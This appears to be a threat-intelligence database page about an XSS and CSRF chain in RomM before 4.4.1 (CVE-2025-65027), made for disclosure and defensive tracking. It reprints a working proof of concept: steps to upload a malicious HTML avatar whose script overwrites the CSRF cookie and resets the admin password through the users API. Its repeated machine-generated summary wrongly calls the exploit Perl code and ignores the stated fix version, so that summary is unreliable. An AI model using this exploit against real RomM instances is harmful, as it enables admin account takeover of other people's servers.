RomM 4.4.0 - XSS_CSRF Chain
RomM 4.4.0 - XSS_CSRF Chain
AI Analysis
Technical Summary
RomM 4.4.0 suffers from a combined XSS and CSRF vulnerability chain. The XSS vulnerability allows injection of malicious scripts, which can be used in conjunction with CSRF to perform unauthorized state-changing requests on behalf of authenticated users. The exploit code is publicly available in Perl, demonstrating the feasibility of the attack. No affected versions beyond 4.4.0 are specified, and no vendor advisory or patch information is provided.
Potential Impact
Successful exploitation could allow attackers to execute arbitrary scripts in the context of the victim's browser and perform unauthorized actions without user consent. This may lead to session hijacking, unauthorized transactions, or other malicious activities depending on the application's functionality. However, no active exploitation in the wild has been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, consider implementing web application firewall (WAF) rules to detect and block XSS and CSRF attack patterns and review application code for proper input validation and anti-CSRF tokens.
Indicators of Compromise
- exploit-code: # Exploit Title: RomM < 4.4.1 - XSS_CSRF Chain # Date: 2025-12-03 # Exploit Author: He4am (https://github.com/mHe4am) # Vendor Homepage: https://romm.app/ # Software Link: https://github.com/rommapp/romm (Docker: https://hub.docker.com/r/rommapp/romm) # Version: < 4.4.1 # Tested on: Linux # CVE: CVE-2025-65027 # ------------------- # Vulnerability: Chaining unrestricted file upload (XSS) + CSRF token reuse to bypass SameSite protection # Impact: Admin account takeover # Prerequisites: # 1. Attacker needs an authenticated account (Viewer role is sufficient) # 2. Victim must visit the uploaded malicious HTML file via a direct link # Steps to reproduce: # 1. Login to RomM # 2. Obtain your CSRF token: # - Open browser DevTools > Application tab (or Storage on Firefox) > Cookies # - Copy the `romm_csrftoken` cookie value # 3. Replace <ATTACKER_CSRF_TOKEN> below with your token # 4. Replace <TARGET_ROMM_URL> with the target RomM instance URL (e.g., http://romm.local) # 5. Save this file as `avatar.html` # 6. Upload it as your profile avatar (http://romm.local/user/me) and click the Apply button # 7. Locate the uploaded file's direct link: # - DevTools > Network tab > Filter for `.html` files # - Or capture it via proxy (e.g., Burp Suite) # - It's usually something like: "http://romm.local/assets/romm/assets/users/<Random-ID>/profile/avatar.html" # 8. Send this direct link of the uploaded avatar/file to the victim # 9. When victim (e.g. admin) opens the link, their password will be changed to "Passw0rd" # ------------------- # PoC Code: <script> const csrfToken = "<ATTACKER_CSRF_TOKEN>"; // CHANGE THIS - Your CSRF token from step 2 const targetURL = "<TARGET_ROMM_URL>"; // CHANGE THIS - Target RomM URL (e.g., http://romm.local) const targetUserID = 1; // Default admin ID is always 1, CHANGE THIS if needed const newPassword = "Passw0rd"; // Password to set for victim // Overwrite CSRF cookie to match our token document.cookie = `romm_csrftoken=${csrfToken}; path=/`; // Execute account takeover by forcing the victim to change their password fetch(targetURL + "/api/users/" + targetUserID, { method: 'PUT', credentials: 'include', // Send victim's session cookie headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'x-csrftoken': csrfToken }, body: "password=" + newPassword }) .then(() => { console.log("Password changed successfully"); }) .catch(err => { console.error("Attack failed:", err); }); </script> # ------------------- # See full writeup for technical details: https://he4am.medium.com/bypassing-samesite-protection-chaining-xss-and-csrf-for-admin-ato-in-romm-44d910c54403
RomM 4.4.0 - XSS_CSRF Chain
Description
RomM 4.4.0 - XSS_CSRF Chain
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
RomM 4.4.0 suffers from a combined XSS and CSRF vulnerability chain. The XSS vulnerability allows injection of malicious scripts, which can be used in conjunction with CSRF to perform unauthorized state-changing requests on behalf of authenticated users. The exploit code is publicly available in Perl, demonstrating the feasibility of the attack. No affected versions beyond 4.4.0 are specified, and no vendor advisory or patch information is provided.
Potential Impact
Successful exploitation could allow attackers to execute arbitrary scripts in the context of the victim's browser and perform unauthorized actions without user consent. This may lead to session hijacking, unauthorized transactions, or other malicious activities depending on the application's functionality. However, no active exploitation in the wild has been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, consider implementing web application firewall (WAF) rules to detect and block XSS and CSRF attack patterns and review application code for proper input validation and anti-CSRF tokens.
Technical Details
- Edb Id
- 52505
- Has Exploit Code
- true
- Code Language
- perl
Indicators of Compromise
Exploit Source Code
Exploit code for RomM 4.4.0 - XSS_CSRF Chain
# Exploit Title: RomM < 4.4.1 - XSS_CSRF Chain # Date: 2025-12-03 # Exploit Author: He4am (https://github.com/mHe4am) # Vendor Homepage: https://romm.app/ # Software Link: https://github.com/rommapp/romm (Docker: https://hub.docker.com/r/rommapp/romm) # Version: < 4.4.1 # Tested on: Linux # CVE: CVE-2025-65027 # ------------------- # Vulnerability: Chaining unrestricted file upload (XSS) + CSRF token reuse to bypass SameSite protection # Impact: Admin account takeover # Prerequisites: # 1. A... (2182 more characters)
Threat ID: 69d842c21cc7ad14da3f5b10
Added to database: 4/10/2026, 12:22:26 AM
Last enriched: 4/10/2026, 12:22:35 AM
Last updated: 4/10/2026, 8:19:30 AM
Views: 4
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.